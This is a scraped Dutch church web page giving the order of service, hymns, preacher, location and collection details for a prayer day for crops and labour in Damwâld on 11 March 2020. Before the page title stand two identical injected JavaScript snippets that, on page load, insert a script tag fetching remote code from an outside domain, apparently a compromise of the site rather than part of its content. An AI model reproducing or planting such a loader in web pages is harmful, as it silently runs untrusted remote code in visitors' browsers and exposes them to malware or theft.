;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Biddag voor gewas en arbeid - PKN Damwâld
woensdag 11 maart 2020
19:30 uur

Biddag voor gewas en arbeid

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jaap van der Horn
Liturgie
Lied voor de dienst Nlb 146 : 1 en 3
Welkomstwoord
We zingen: Nlb 978 : 1, 2 en 4
Stil gebed, Votum en groet
We zingen: Nlb 33 : 2 en 8
Geloofsbelijdenis .
We zingen: Elb 343 : 1, 2 en 3
Gebed
We lezen: Jes.40: 12 - 31
We zingen: Nlb 981 : 1, 3 en 4
Preek .
We zingen: Nlb 89 : 5 en 9
Dankgebed en voorbede
Collecte
We zingen: Nlb 248 : 1, 2 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Groentezaden voor een gezin

Bidstond: ORA -Een collecte voor een jaar lang eten – Groentezaden voor een gezin
Gebrek aan gezond voedsel is in veel landen voor gezinnen met een minimaal inkomen een enorm probleem. Maar met het bewerken van een paar vierkante meter grond is al snel een goede opbrengst te behalen. Deze collecte is bestemd voor de aankoop en verzending van groentezadenpakketten voor gezinnen in Oost-Europa, Afrika en Azië. Een groentezadenpakket bevat zeven verschillende groentezaden en levert meer dan voldoende groenten op voor een groot gezin. Helpt u mee?

Tweede collecte: Kerk
Uitganscollecte: Bidstondcollecte